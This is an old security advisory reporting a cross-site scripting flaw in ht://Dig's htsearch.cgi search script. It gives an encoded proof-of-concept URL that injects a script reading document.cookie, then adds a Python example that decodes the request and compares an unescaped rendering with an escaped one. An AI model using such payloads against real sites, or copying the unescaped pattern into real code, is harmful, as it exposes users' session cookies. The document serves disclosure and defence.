XSS in HTDIG

2002-06-27T00:00:00
ID SECURITYVULNS:DOC:3143
Type securityvulns
Reporter Securityvulns
Modified 2002-06-27T00:00:00

Description

E.g.:

http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

(all URLs must be on one line)

Apologies if this is a known issue. Apologies also for posting about XSS, but this is not an isolated website; it is a commonly used service.

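The request above, decoded and rendered two ways, as an added example that is not part of the original post and not ht://Dig's own code. It assumes the search terms are echoed back inside a form field's `value` attribute (suggested by the leading `">` in the request); `TEMPLATE` and all function names are hypothetical.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Request URL exactly as given in the advisory.
ADVISORY_URL = (
    "http://www.anyhost.com/cgi-bin/htsearch.cgi?words="
    "%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
)

# Hypothetical results-page fragment (assumption: the search terms are echoed
# back inside an attribute value; this is not ht://Dig's real template).
TEMPLATE = '<input type="text" name="words" value="{words}">'


def search_words(url):
    """Return the decoded `words` parameter, as the CGI would receive it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("words", [""])[0]


def render_unescaped(words):
    """Vulnerable pattern: request data copied into the markup verbatim."""
    return TEMPLATE.format(words=words)


def render_escaped(words):
    """Hardened pattern: encode &, <, > and both quote characters on output."""
    return TEMPLATE.format(words=html.escape(words, quote=True))


def breaks_out_of_attribute(rendered):
    """True if the echoed value added raw quotes or tags to the fragment."""
    return (rendered.count("<") != TEMPLATE.count("<")
            or rendered.count('"') != TEMPLATE.count('"'))


if __name__ == "__main__":
    words = search_words(ADVISORY_URL)
    for render in (render_unescaped, render_escaped):
        page = render(words)
        print(render.__name__, "breaks out:", breaks_out_of_attribute(page))
        print("   ", page)
```

The same structural check can be used as a regression test against a patched results page: the number of raw `<` and `"` characters in the output must not depend on the query string.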